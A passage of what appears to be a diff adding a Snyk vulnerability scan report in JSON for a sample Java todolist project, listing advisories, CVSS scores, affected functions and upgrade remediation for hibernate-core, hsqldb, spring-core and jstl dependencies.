"packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + 
"severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": 
"org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + 
"assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + 
"version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL 
Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + 
"vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + 
"publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": 
"https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. 
By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + 
"org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal 
